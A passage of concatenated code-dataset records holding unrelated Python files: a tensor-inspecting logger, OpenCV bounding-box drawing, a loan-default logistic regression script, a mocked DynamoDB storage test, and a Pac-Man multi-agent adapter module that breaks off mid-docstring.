ret\n","sub_path":"salt/modules/layman.py","file_name":"layman.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"197043939","text":"from typing import TYPE_CHECKING, List, Tuple\n\nfrom ...logger import Text, StyleCode\n\nif TYPE_CHECKING:\n from . import Logger\n\ntry:\n import torch\nexcept ImportError:\n torch = None\n\ntry:\n import numpy\nexcept ImportError:\n numpy = None\n\n\nclass Inspect:\n def __init__(self, logger: 'Logger'):\n self.__logger = logger\n\n def _key_value_pair(self, key: any, value: any, style: StyleCode = Text.meta):\n return [(f'{str(key)}: ', Text.subtle),\n (str(value), style)]\n\n def _format_tensor(self, s: List[str], limit: int = 1_000, style: StyleCode = Text.value):\n res = []\n length = 0\n for p in s:\n if p in [',', ']', '[', '...']:\n res.append((p, Text.subtle))\n else:\n res.append((p, style))\n length += len(p)\n\n if length > limit:\n res.append((' ... 
', Text.warning))\n break\n\n return res\n\n def _get_tensor_value(self, tensor):\n if torch is not None and isinstance(tensor, torch.Tensor):\n return str(tensor.item())\n else:\n return str(tensor)\n\n def _render_tensor(self, tensor, *, new_line: str = '\\n', indent: str = ''):\n if len(tensor) > 5:\n idx = [0, 1, 2, '...', len(tensor) - 1]\n else:\n idx = [i for i in range(len(tensor))]\n\n res = [indent, '[']\n if new_line == '\\n':\n next_indent = ' ' + indent\n else:\n next_indent = indent\n if len(tensor.shape) > 1:\n res.append(new_line)\n for i in idx:\n if i == '...':\n res.append(next_indent)\n res.append('...')\n else:\n res += self._render_tensor(tensor[i],\n new_line=new_line,\n indent=next_indent)\n if i != idx[-1]:\n res.append(', ')\n res.append(new_line)\n else:\n for i in idx:\n if i == '...':\n res.append('...')\n else:\n res += self._get_tensor_value(tensor[i])\n if i != idx[-1]:\n res.append(', ')\n\n res.append(indent)\n res.append(']')\n\n return res\n\n def _get_value_full(self, value: any):\n if isinstance(value, str):\n return [('\"', Text.subtle),\n (value, Text.value),\n ('\"', Text.subtle)]\n elif numpy is not None and isinstance(value, numpy.ndarray):\n return [*self._key_value_pair('dtype', value.dtype),\n '\\n',\n *self._key_value_pair('shape', [s for s in value.shape], Text.value),\n '\\n',\n *self._key_value_pair('min', numpy.min(value)),\n ' ',\n *self._key_value_pair('max', numpy.max(value)),\n ' ',\n *self._key_value_pair('mean', numpy.mean(value)),\n ' ',\n *self._key_value_pair('std', numpy.std(value)),\n '\\n',\n *self._format_tensor(self._render_tensor(value, new_line='\\n'))]\n elif torch is not None and isinstance(value, torch.Tensor):\n return [*self._key_value_pair('dtype', value.dtype),\n '\\n',\n *self._key_value_pair('shape', [s for s in value.shape], Text.value),\n '\\n',\n *self._key_value_pair('min', torch.min(value).item()),\n ' ',\n *self._key_value_pair('max', torch.max(value).item()),\n ' ',\n *self._key_value_pair('mean', torch.mean(value.to(torch.float)).item()),\n ' ',\n *self._key_value_pair('std', torch.std(value.to(torch.float)).item()),\n '\\n',\n *self._format_tensor(self._render_tensor(value, new_line='\\n'))]\n\n s = str(value)\n s = s.replace('\\r', '')\n return [s]\n\n def _shrink(self, s: str, style: StyleCode = Text.value, limit: int = 80):\n s = s.replace('\\r', '')\n lines = s.split('\\n')\n\n res = []\n length = 0\n for line in lines:\n if len(res) > 0:\n res.append(('\\\\n', Text.subtle))\n if len(line) + length < limit:\n res.append((line, style))\n length += len(line)\n else:\n res.append((line[:limit - length], style))\n res.append((' ...', Text.warning))\n break\n\n return res\n\n def _get_value_line(self, value: any):\n if isinstance(value, str):\n return [('\"', Text.subtle)] + self._shrink(value) + [('\"', Text.subtle)]\n elif numpy is not None and isinstance(value, numpy.ndarray):\n return [*self._format_tensor(self._render_tensor(value, new_line=''), limit=80)]\n elif torch is not None and isinstance(value, torch.Tensor):\n return [*self._format_tensor(self._render_tensor(value, new_line=''), limit=80)]\n\n s = str(value)\n return self._shrink(s)\n\n def _log_key_value(self, items: List[Tuple[any, any]], is_show_count=True):\n max_key_len = 0\n for k, v in items:\n max_key_len = max(max_key_len, len(str(k)))\n\n count = 0\n for k, v in items:\n count += 1\n spaces = \" \" * (max_key_len - len(str(k)))\n s = self._get_value_line(v)\n self.__logger.log([(f\"{spaces}{k}: \", Text.key)] +\n 
self._get_value_line(v))\n\n        if is_show_count:\n            self.__logger.log([\n                \"Total \",\n                (str(count), Text.meta),\n                \" item(s)\"])\n\n    def info(self, *args, **kwargs):\n        if len(args) == 0:\n            self._log_key_value([(k, v) for k, v in kwargs.items()], False)\n        elif len(args) == 1:\n            assert len(kwargs.keys()) == 0\n            arg = args[0]\n            if type(arg) == list:\n                self._log_key_value([(i, v) for i, v in enumerate(arg)])\n            elif type(arg) == dict:\n                keys = list(arg.keys())\n                keys.sort()\n                self._log_key_value([(k, arg[k]) for k in keys])\n            else:\n                self.__logger.log(self._get_value_full(arg))\n        else:\n            assert len(kwargs.keys()) == 0\n            self._log_key_value([(i, v) for i, v in enumerate(args)], False)\n","sub_path":"labml/internal/logger/inspect.py","file_name":"inspect.py","file_ext":"py","file_size_in_byte":6663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"152283901","text":"import colorsys\r\nimport numpy as np\r\nimport cv2\r\nfrom unidecode import unidecode\r\n\r\n# Inspired by https://github.com/hhk7734/tensorflow-yolov4\r\n\r\n_MAX_CLASSES = 14 * 6\r\n_HSV = [(x / _MAX_CLASSES, 1.0, 1.0) for x in range(int(_MAX_CLASSES * 1.2))]\r\n_COLORS = [colorsys.hsv_to_rgb(*x) for x in _HSV]\r\n_COLORS = [(int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)) for x in _COLORS]\r\n_BBOX_COLORS = []\r\nfor i in range(_MAX_CLASSES):\r\n    # 0 14 28 42 56 70 1 15 29 43 57 71 2 ...\r\n    _BBOX_COLORS.append(_COLORS[14 * (i % 6) + (i // 6)])\r\n\r\ndef draw_bboxes_without_text(\r\n    image: np.ndarray, bboxes: np.ndarray\r\n):\r\n    \"\"\"\r\n    @param `image`: Dim(height, width, channel)\r\n    @param `bboxes`\r\n        Dim(-1, (x_min, y_min, x_max, y_max))\r\n    @return drawn_image\r\n    Usage:\r\n        image = draw_bboxes_without_text(image, bboxes)\r\n    \"\"\"\r\n    height, width, _ = image.shape\r\n    image = np.copy(image)\r\n\r\n    # Draw bboxes\r\n    for bbox_id, bbox in enumerate(bboxes):\r\n\r\n        left = int(bbox[0]) # x_min\r\n        top = int(bbox[1]) # y_min\r\n        right = int(bbox[2]) # x_max\r\n        bottom = int(bbox[3]) # y_max\r\n\r\n        color = (255, 0, 0)\r\n\r\n        cv2.rectangle(image, (left, top), (right, bottom), color, 1)\r\n    return image\r\n\r\ndef draw_bboxes(\r\n    image: np.ndarray, bboxes: np.ndarray, probs: np.ndarray, names: np.ndarray\r\n):\r\n    \"\"\"\r\n    @param `image`: Dim(height, width, channel)\r\n    @param `bboxes`\r\n        Dim(-1, (x_min, y_min, x_max, y_max))\r\n    @param `probs`\r\n        Dim(-1,)\r\n    @param `names`\r\n        Dim(-1,)\r\n    @return drawn_image\r\n    Usage:\r\n        image = yolo.draw_bboxes(image, bboxes, probs, names)\r\n    \"\"\"\r\n    height, width, _ = image.shape\r\n    image = np.copy(image)\r\n    name_ids = np.unique(names)\r\n\r\n    # Draw bboxes\r\n    for bbox_id, bbox in enumerate(bboxes):\r\n\r\n        left = int(bbox[0]) # x_min\r\n        top = int(bbox[1]) # y_min\r\n        right = int(bbox[2]) # x_max\r\n        bottom = int(bbox[3]) # y_max\r\n\r\n        font_size = 0.4\r\n        font_thickness = 1\r\n\r\n        # find name id, prob and set color\r\n        name_id = np.where(np.array(name_ids) == names[bbox_id])[0][0]\r\n        prob = probs[bbox_id]\r\n        color = _BBOX_COLORS[name_id%_MAX_CLASSES]\r\n\r\n        # Get text size\r\n        bbox_text = \"{}: {:.1%}\".format(names[bbox_id], prob)\r\n        t_w, t_h = cv2.getTextSize(bbox_text, 0, font_size, font_thickness)[0]\r\n        t_h += 3\r\n\r\n        # Draw box\r\n        if top < t_h:\r\n            top = t_h\r\n        if left < 1:\r\n            left = 1\r\n        if bottom >= height:\r\n            bottom = height - 1\r\n        if right >= width:\r\n            right = width - 1\r\n\r\n        cv2.rectangle(image, (left, top), (right, bottom), color, 1)\r\n\r\n        # Draw text box\r\n        cv2.rectangle(image, (left, top), (left + t_w, top - t_h), color, -1)\r\n\r\n        # Draw text\r\n        cv2.putText(\r\n            image,\r\n            unidecode(bbox_text), # OpenCV does not handle ~, ^, ´, etc..\r\n            (left, top - 2),\r\n            cv2.FONT_HERSHEY_SIMPLEX,\r\n            font_size,\r\n            (\r\n                255 - color[0],\r\n                255 - color[1],\r\n                255 - color[2],\r\n            ),\r\n            font_thickness,\r\n            lineType=cv2.LINE_AA,\r\n        )\r\n\r\n    return image","sub_path":"tasks/cv-ocr/draws.py","file_name":"draws.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"423360467","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Dec 1 17:54:30 2018\r\n\r\n@author: suvanjeet\r\n\"\"\"\r\n\r\n#%%\r\n# June 2007 to May 2015 - training data, from June 2015 to Dec 2015 Testing data\r\ntest_month = ['Jun-2015', 'Jul-2015', 'Aug-2015', 'Sep-2015', 'Oct-2015', 'Nov-2015', 'Dec-2015']\r\nTest_data = df2.loc[df2['issue_d'].isin(test_month)]\r\nTrain_data = df2.loc[~df2['issue_d'].isin(test_month)]\r\n#%%\r\nTest_data = Test_data.drop('issue_d', axis=1)\r\nTrain_data = Train_data.drop('issue_d', axis=1)\r\n\r\nTest_data.shape[0]+Train_data.shape[0]\r\ndf.shape[0]\r\n#%%\r\nX_train= pd.DataFrame(Train_data.values[:,:-1])\r\ny_train = pd.DataFrame(Train_data.values[:,-1])\r\n\r\nX_test= pd.DataFrame(Test_data.values[:,:-1])\r\ny_test = pd.DataFrame(Test_data.values[:,-1])\r\n\r\n#X_train, X_test, y_train, y_test = train_test_split(X,y,test_size = 0.3, random_state = 10)\r\n#%%\r\nfrom sklearn.preprocessing 
import StandardScaler\r\nscaler = StandardScaler()\r\nscaler = scaler.fit(X_train)\r\nX_train = scaler.transform(X_train)\r\nX_test = scaler.transform(X_test)\r\n#%%\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\r\n\r\ndef fit_and_evaluate(model): \r\n # Train the model\r\n model.fit(X_train, y_train) \r\n # Make predictions and evalute\r\n model_pred = model.predict(X_test)\r\n model_acc = model.score(X_test, y_test) \r\n # Return the performance metric\r\n return model_acc\r\n\r\nlr = LogisticRegression()\r\n'''lr = RandomForestClassifier()\r\nlr = GradientBoostingClassifier()'''\r\nlr_acc = fit_and_evaluate(lr)\r\nprint('Linear Regression Classifier on the test set: ACC = %0.6f' % lr_acc)\r\n#%%\r\nfrom sklearn.metrics import classification_report\r\nmodel1 = lr.fit(X_train, y_train)\r\ny_pred = model1.predict(X_test)\r\nclassification_report(y_test, y_pred)\r\n\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score, classification_report\r\ncfm=confusion_matrix(y_test,y_pred)\r\nprint(cfm) # to print confusion matrix , classification details\r\ny_pred_prob= lr.predict_proba(X_test)\r\nprint(y_pred_prob)\r\n\r\n#%%\r\nprint(\"classification report\")\r\n\r\nprint(classification_report(y_test,y_pred))\r\n\r\n\r\n#%%\r\n\r\nplt.figure(figsize=(9,9))\r\nsns.heatmap(cfm, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r');\r\nplt.ylabel('Actual label');\r\nplt.xlabel('Predicted label');\r\nall_sample_title = 'Accuracy Score: {0}'.format(score)\r\nplt.title(all_sample_title, size = 15);\r\n#%%\r\n# store the predicted probabilities\r\n\r\n'''y_pred_prob= lr.predict_proba(X_test)\r\nprint(y_pred_prob)\r\n# for loopfor tuning'''\r\n\r\n#%%\r\n\r\nfor a in np.arange(0,1,0.05):\r\n predict_mine= np.where(y_pred_prob[:,1]>a,1,0)\r\n cfm= confusion_matrix(y_test,predict_mine)\r\n total_err=cfm[0,1]+cfm[1,0]\r\n print('Errors at threshould',round(a,2),\" : \", total_err, \", type 2 error-\",cfm[1,0], \", type 1 error: \",cfm[0,1])\r\n\r\n\r\n#%%\r\ny_pred_class=[]\r\nfor value in y_pred_prob[:,0]:\r\n if value >0.5: #it has taken the weightage for col 0 in y_pred_prob\r\n y_pred_class.append(0)\r\n else:\r\n y_pred_class.append(1)\r\n# 0.45 is good as errors are low and the type 2 error are also less\r\n#%%\r\nfrom sklearn import metrics\r\n\r\nfpr, tpr, threshold = metrics.roc_curve(y_test, y_pred_class)\r\nauc = metrics.auc(fpr,tpr)\r\nprint(auc)\r\nprint(fpr)\r\nprint(tpr)\r\nprint(threshold)\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.title('Receiver Operating Characteristic')\r\nplt.plot(fpr, tpr, 'b', label = auc)\r\nplt.legend(loc = 'lower right')\r\nplt.plot([0, 1], [0, 1],'r--')\r\nplt.xlim([0, 1])\r\nplt.ylim([0, 1])\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\n\r\nplt.show()\r\n\r\n#%%\r\nfrom sklearn import metrics\r\n\r\nfpr, tpr, threshold = metrics.roc_curve(y_test, y_pred_prob[:,1])\r\nauc = metrics.auc(fpr,tpr)\r\nprint(auc)\r\n\r\n \r\n\r\nimport matplotlib.pyplot as plt\r\nplt.title('Receiver Operating Characteristic')\r\nplt.plot(fpr, tpr, 'b', label = auc)\r\nplt.legend(loc = 'lower right')\r\nplt.plot([0, 1], [0, 1],'r--')\r\nplt.xlim([0, 1])\r\nplt.ylim([0, 1])\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\n\r\nplt.show()\r\n#%%\r\n'''plt.figure(figsize=(9,9))\r\nsns.heatmap(cfm, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r');\r\nplt.ylabel('Actual 
label');\r\nplt.xlabel('Predicted label');\r\nall_sample_title = 'Accuracy Score: {0}'.format(score)\r\nplt.title(all_sample_title, size = 15);'''\r\n#%%\r\nclassifier=(LogisticRegression())\r\n\r\nfrom sklearn import cross_validation\r\n#performing kfold_cross_validation\r\nkfold_cv=cross_validation.KFold(n=len(X_train),n_folds=10)\r\nprint(kfold_cv)\r\n\r\n#running the model using scoring metric as accuracy\r\nkfold_cv_result=cross_validation.cross_val_score(estimator=classifier,X=X_train,y=y_train, cv=kfold_cv)\r\nprint(kfold_cv_result)\r\n\r\n#%%\r\n#finding the mean\r\nprint(kfold_cv_result.mean())\r\n#%%\r\n''' heat map before vif(multi colinearity)\r\ngrade - default ind\r\nemp_title default ind\r\naddr_state - default ind\r\npurpose - default'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"project_final_part1.py","file_name":"project_final_part1.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"305517247","text":"import boto3\nfrom flask import current_app\nfrom moto import mock_dynamodb2\n\nfrom app.data_models.app_models import QuestionnaireState\nfrom app.storage.dynamodb import Dynamodb\nfrom app.storage.errors import ItemAlreadyExistsError\nfrom app.storage.storage import StorageModel\nfrom tests.app.app_context_test_case import AppContextTestCase\n\n\nclass TestDynamo(AppContextTestCase):\n def setUp(self):\n self._ddb = mock_dynamodb2()\n self._ddb.start()\n\n super().setUp()\n\n client = boto3.resource(\"dynamodb\", endpoint_url=None)\n self.ddb = Dynamodb(client)\n\n for config in StorageModel.TABLE_CONFIG_BY_TYPE.values():\n table_name = current_app.config[config[\"table_name_key\"]]\n if table_name:\n client.create_table( # pylint: disable=no-member\n TableName=table_name,\n AttributeDefinitions=[\n {\"AttributeName\": config[\"key_field\"], \"AttributeType\": \"S\"}\n ],\n KeySchema=[\n {\"AttributeName\": config[\"key_field\"], \"KeyType\": \"HASH\"}\n ],\n ProvisionedThroughput={\n \"ReadCapacityUnits\": 1,\n \"WriteCapacityUnits\": 1,\n },\n )\n\n def tearDown(self):\n super().tearDown()\n\n self._ddb.stop()\n\n def test_get_update(self):\n self._assert_item(None)\n self._put_item(1)\n self._assert_item(1)\n self._put_item(2)\n self._assert_item(2)\n\n def test_dont_overwrite(self):\n self._put_item(1)\n with self.assertRaises(ItemAlreadyExistsError):\n self._put_item(1, overwrite=False)\n\n def test_delete(self):\n self._put_item(1)\n self._assert_item(1)\n model = QuestionnaireState(\"someuser\", \"data\", \"ce_sid\", 1)\n self.ddb.delete(model)\n self._assert_item(None)\n\n def _assert_item(self, version):\n item = self.ddb.get(QuestionnaireState, \"someuser\")\n actual_version = item.version if item else None\n self.assertEqual(actual_version, version)\n\n def _put_item(self, version, overwrite=True):\n model = QuestionnaireState(\"someuser\", \"data\", \"ce_sid\", version)\n self.ddb.put(model, overwrite)\n","sub_path":"tests/app/storage/test_dynamodb.py","file_name":"test_dynamodb.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"571968197","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Define the agents.\n\nAttributes:\n DEFAULT_NOISE: The default noise, 0.\n NOISE: The noise value, 0.\n GHOST_ACTIONS: List of ghost actions, [Directions.NORTH, Directions.SOUTH,\n Directions.EAST, Directions.WEST].\n PACMAN_ACTIONS: List of pacman actions, 
GHOST_ACTIONS + [Directions.STOP].\n    PACMAN_INDEX: The pacman index, 0.\n\nTo create a new Pacman agent just follow these steps:\n\n    1) First create your new Pacman class and define your choose_action\n    function in the agents.py file. This is going to be how your\n    pac-man behaves.\n\n    2) Then, in the Adapter class of the adapter.py file, add your new agent\n    to the Pacman agent setup list to make it acceptable, and add its name\n    to the raise ValueError list of acceptable agents. Example:\n\n        elif pacman_agent == 'your_pacman_agent_name':\n            self.pacman_class = agents.Your_pacman_Class\n        else:\n            raise ValueError('Pac-Man agent must be ai, random,\n                eater or your_pacman_agent_name.')\n\n    3) To finish, change the Get_Adapter function in the cliparser.py file\n    to accept your agent. Add 'your_pacman_agent_name' to the choices of\n    group.add_argument pacman-agent.\n\n    4) Now you can run the simulator using your new agent. To do it you\n    just need to initialize the adapter.py using the -pacman-agent\n    'your_pacman_agent_name' flag.\n\"\"\"\n\nimport random\n\nfrom berkeley.game import Agent as BerkeleyGameAgent, Directions\n\nimport behaviors\nimport features\nimport learning\nimport Queue\n\nfrom communication import (ZMQMessengerBase, RequestGameStartMessage,\n                           RequestProbabilityMapMessage,\n                           StateMessage, ProbabilityMapMessage,\n                           RequestLearnMessage, SharedLearnMessage,\n                           ProbabilityMapMSEMessage, MSEMessage,)\n\n__author__ = \"Matheus Portela and Guilherme N. Ramos\"\n__credits__ = [\"Matheus Portela\", \"Guilherme N. Ramos\", \"Renato Nobre\",\n               \"Pedro Saman\"]\n__maintainer__ = \"Guilherme N. Ramos\"\n__email__ = \"gnramos@unb.br\"\n\n# Default settings\nDEFAULT_NOISE = 0\n\n# Global variable\nNOISE = 0\n\nGHOST_ACTIONS = [Directions.NORTH, Directions.SOUTH, Directions.EAST,\n                 Directions.WEST]\nPACMAN_ACTIONS = GHOST_ACTIONS + [Directions.STOP]\nPACMAN_INDEX = 0\n\n###############################################################################\n#                              AdapterAgents                                  #\n###############################################################################\n\n\nclass AdapterAgent(object, BerkeleyGameAgent):\n    \"\"\"Communicating client for game adapter.\n\n    Communicating client to the BerkeleyGameAgent for the game adapter.\n\n    Attributes:\n        agent_id: The identifier of the agent.\n        client: A client instance of ZMQMessengerBase.\n        previous_action: Directions.STOP.\n        test_mode: Test mode is set to 'False'.\n    \"\"\"\n\n    def __init__(self, agent_id, client):\n        \"\"\"Constructor method for AdapterAgent Class.\n\n        Initiates the BerkeleyGameAgent.\n\n        Args:\n            agent_id: The identifier of the agent.\n            client: A client instance of ZMQMessengerBase\n        Raises:\n            ValueError: Invalid Client\n        \"\"\"\n        BerkeleyGameAgent.__init__(self, agent_id)\n\n        self.agent_id = agent_id\n\n        if not isinstance(client, ZMQMessengerBase):\n            raise ValueError('Invalid client')\n\n        self.client = client\n\n        self.previous_action = Directions.STOP\n\n        self.test_mode = False\n\n        self.agentRealPosition = (0, 0)\n\n        self.simulationCount = 1\n\n    def __noise_error__(self):\n        \"\"\"Return the noise from the noise interval.\n\n        Return:\n            Random noise.\n        \"\"\"\n        noiseError = random.randrange(-NOISE, NOISE + 1)\n        # print noiseError\n        return noiseError\n\n    def calculate_reward(self, current_score):\n        \"\"\"Base calculate reward method.\n\n        Should be overridden by a calculate_reward method inside an\n        AdapterAgent subclass.\n\n        Args:\n            current_score: The current score from a state.\n        Raises:\n            NotImplementedError: Communicating agent must 
calculate score.\n \"\"\"\n raise NotImplementedError('Communicating agent must calculate score')\n\n def communicate(self, msg):\n \"\"\"Send a given message and return a message requested.\n\n Args:\n msg: A message for communication\n Returns:\n A message requested to ZMQMessengerBase.\n \"\"\"\n # print msg\n self.client.send(msg)\n return self.client.receive()\n\n def create_state_message(self, state):\n \"\"\"Create a message.\n\n Create a message that contains agent_id, agent_positions,\n food_positions fragile_agents, wall_positions, legal_actions, reward,\n executed_action and test_mode.\n\n Args:\n state: A state of the game.\n Returns:\n msg: A message containing agent_id, agent_positions, food_positions\n fragile_agents, wall_positions, legal_actions, reward,\n executed_action and test_mode.\n \"\"\"\n agent_positions = {}\n\n pos = state.getPacmanPosition()\n real_position = state.getPacmanPosition()\n pos_y = pos[::-1][0]\n pos_x = pos[::-1][1]\n real_position = (pos_y, pos_x)\n pos_y = pos[::-1][0] + self.__noise_error__()\n pos_x = pos[::-1][1] + self.__noise_error__()\n agent_positions[PACMAN_INDEX] = (pos_y, pos_x)\n\n for id_, pos in enumerate(state.getGhostPositions()):\n pos_y = pos[::-1][0] + self.__noise_error__()\n pos_x = pos[::-1][1] + self.__noise_error__()\n agent_positions[id_ + 1] = (pos_y, pos_x)\n\n food_positions = []\n for x, row in enumerate(state.getFood()):\n for y, is_food in enumerate(row):\n if is_food:\n food_positions.append((y, x))\n\n fragile_agents = {}\n for id_, s in enumerate(state.data.agentStates):\n fragile_agents[id_] = 1.0 if s.scaredTimer > 0 else 0.0\n\n wall_positions = []\n for x, row in enumerate(state.getWalls()):\n for y, is_wall in enumerate(row):\n if is_wall:\n wall_positions.append((y, x))\n\n reward = self.calculate_reward(state.getScore())\n self.previous_score = state.getScore()\n\n msg = StateMessage(agent_id=self.agent_id,\n agent_positions=agent_positions,\n food_positions=food_positions,\n fragile_agents=fragile_agents,\n wall_positions=wall_positions,\n legal_actions=state.getLegalActions(self.agent_id),\n reward=reward,\n executed_action=self.previous_action,\n test_mode=self.test_mode,\n realPosition=real_position)\n\n return msg\n\n def enable_learn_mode(self):\n \"\"\"Enable Learn Mode.\"\"\"\n self.test_mode = False\n\n def enable_test_mode(self):\n \"\"\"Enable Test Mode.\"\"\"\n self.test_mode = True\n\n def getAction(self, state):\n \"\"\"Get an action from directions.\n\n Args:\n state: A state of the game.\n Returns:\n An action from Directions.\n \"\"\"\n msg = self.create_state_message(state)\n reply_msg = self.communicate(msg)\n\n self.previous_action = reply_msg.action\n\n if reply_msg.action not in state.getLegalActions(self.agent_id):\n self.invalid_action = True\n return self.act_when_invalid(state)\n else:\n self.invalid_action = False\n return reply_msg.action\n\n def start_game(self, layout):\n \"\"\"Set the start settings for the game agent.\n\n Args:\n layout: A game layout.\n \"\"\"\n self.previous_score = 0\n self.previous_action = Directions.STOP\n msg = RequestGameStartMessage(agent_id=self.agent_id,\n map_width=layout.width,\n map_height=layout.height)\n self.communicate(msg)\n\n def update(self, state):\n \"\"\"Create a state message from the current state.\n\n Create a state message from the current state and communicate.\n\n Args:\n state: A state of the game.\n \"\"\"\n msg = self.create_state_message(state)\n self.communicate(msg)\n\n\nclass PacmanAdapterAgent(AdapterAgent):\n \"\"\"The 
AdapterAgent for the Pacman Classes.\"\"\"\n\n    def __init__(self, client):\n        \"\"\"Extend the Constructor method from the AdapterAgent superclass.\n\n        Args:\n            client: A client instance of ZMQMessengerBase\n        \"\"\"\n        super(PacmanAdapterAgent, self).__init__(agent_id=PACMAN_INDEX,\n                                                 client=client)\n\n    \"\"\"Todo:\n        Is this ever used?\n    \"\"\"\n    def act_when_invalid(self, state):\n        \"\"\"Action when there are no other valid actions.\n\n        Args:\n            state: The current state.\n        Returns:\n            Directions.STOP: The pacman stands still.\n        \"\"\"\n        return Directions.STOP\n\n    def calculate_reward(self, current_score):\n        \"\"\"Calculate the reward.\n\n        Args:\n            current_score: The current score of the agent.\n        Returns:\n            The current_score - previous_score.\n        \"\"\"\n        return current_score - self.previous_score\n\n\nclass GhostAdapterAgent(AdapterAgent):\n    \"\"\"The AdapterAgent for the Ghosts Classes.\n\n    Attributes:\n        previous_action: The previous action, default is Directions.NORTH.\n    \"\"\"\n\n    def __init__(self, agent_id, client, comm, mse):\n        \"\"\"Extend the Constructor method from the AdapterAgent superclass.\n\n        Args:\n            agent_id: The identifier of the agent.\n            client: A client instance of ZMQMessengerBase.\n        \"\"\"\n        super(GhostAdapterAgent, self).__init__(agent_id, client)\n\n        self.previous_action = Directions.NORTH\n        self.comm = comm\n        self.mse = mse\n        # self.actions = GHOST_ACTIONS\n\n    \"\"\"Todo:\n        Is this ever used?\n    \"\"\"\n    # def act_when_invalid(self, state):\n    #     return random.choice(state.getLegalActions(self.agent_id))\n\n    def __get_probability_map__(self, agent_id):\n        \"\"\"Request the agent probability map.\n\n        Args:\n            agent_id: The agent to get the map for.\n        \"\"\"\n        msg = RequestProbabilityMapMessage(agent_id)\n        reply_msg = super(GhostAdapterAgent, self).communicate(msg)\n        return reply_msg.pm\n\n    def __load_probabilities_maps__(self, agent, pm):\n        \"\"\"Set the probability maps back to the agents.\"\"\"\n        msg = ProbabilityMapMessage(agent_id=agent, probability_map=pm)\n        self.client.send(msg)\n        return self.client.receive()\n\n    def __load_probabilities_maps_mse__(self, agent, pm):\n        \"\"\"Set the probability maps back to the agents.\"\"\"\n        msg = ProbabilityMapMSEMessage(agent_id=agent, probability_map=pm)\n        self.client.send(msg)\n        return self.client.receive()\n\n    def calculate_reward(self, current_score):\n        \"\"\"Calculate the reward.\n\n        Args:\n            current_score: The current score of the agent.\n        Returns:\n            The previous_score - current_score.\n        \"\"\"\n        return self.previous_score - current_score\n\n    def __get_learn__(self, agent_id, reward):\n        \"\"\"Request the shared-learning message for the agent.\n\n        Args:\n            agent_id: The agent to get the message for.\n        \"\"\"\n        msg = RequestLearnMessage(agent_id, reward)\n        reply_msg = super(GhostAdapterAgent, self).communicate(msg)\n        return reply_msg\n\n    def __load_learn__(self, agent, pb, reward, state):\n        \"\"\"Send the shared-learning message back to the agents.\"\"\"\n        msg = SharedLearnMessage(agent_id=agent, previous_behavior=pb,\n                                 reward=reward, state=state)\n        self.client.send(msg)\n        return self.client.receive()\n\n    def getAction(self, state):\n        \"\"\"Get an action from directions.\n\n        Args:\n            state: A state of the game.\n\n        Returns:\n            An action from Directions.\n        \"\"\"\n        msg = self.create_state_message(state)\n        reply_msg = self.communicate(msg)\n\n        self.previous_action = reply_msg.action\n\n        if self.mse is True:\n            msg = MSEMessage(agent_id=self.agent_id)\n            self.client.send(msg)\n            self.client.receive()\n\n        if self.comm == 'pm':\n            pm_map = self.__get_probability_map__(self.agent_id)\n            
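# Hedged reading of this round-trip: the ghost requests its probability map\n            # from the controller and immediately sends it back, presumably so the\n            # controller can redistribute each agent's map to its allies.\n            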
self.__load_probabilities_maps__(self.agent_id, pm_map)\n elif self.comm == 'mse':\n pm_map = self.__get_probability_map__(self.agent_id)\n self.__load_probabilities_maps_mse__(self.agent_id, pm_map)\n elif self.comm == 'sharedLearn':\n msg = self.__get_learn__(self.agent_id, msg.reward)\n self.__load_learn__(msg.agent_id, msg.previous_behavior,\n msg.reward, msg.state)\n elif self.comm == 'both':\n pm_map = self.__get_probability_map__(self.agent_id)\n self.__load_probabilities_maps__(self.agent_id, pm_map)\n\n msg = self.__get_learn__(self.agent_id, msg.reward)\n self.__load_learn__(msg.agent_id, msg.previous_behavior,\n msg.reward, msg.state)\n\n if reply_msg.action not in state.getLegalActions(self.agent_id):\n self.invalid_action = True\n return self.act_when_invalid(state)\n else:\n self.invalid_action = False\n return reply_msg.action\n\n###############################################################################\n# #\n###############################################################################\n\n###############################################################################\n# ControllerAgents #\n###############################################################################\n\n\nclass ControllerAgent(object):\n \"\"\"Autonomous agent for game controller.\n\n Attributes:\n agent_id: The identifier of the agent.\n \"\"\"\n\n def __init__(self, agent_id):\n \"\"\"Contructor method for the ControllerAgent.\n\n Args:\n agent_id: The identifier of the agent.\n \"\"\"\n self.agent_id = agent_id\n\n def choose_action(self, state, action, reward, legal_actions, explore):\n \"\"\"Select an action to be executed by the agent.\n\n This is a base choose_action function and should be overwrited in your\n agent subclass. When implement should return a Direction for the agent\n to follow (NORTH, SOUTH, EAST, WEST or STOP).\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of currently allowed actions.\n explore: Boolean whether agent is allowed to explore.\n\n Raises:\n NotImplementedError: Agent must implement choose_action\n \"\"\"\n raise NotImplementedError('Agent must implement choose_action.')\n\n\nclass PacmanAgent(ControllerAgent):\n \"\"\"A Base PacmanAgent.\n\n Attributes:\n actions: List of pacman actions.\n \"\"\"\n\n def __init__(self, agent_id, ally_ids, enemy_ids):\n \"\"\"Extend the Constructor from the ControllerAgent superclass.\n\n 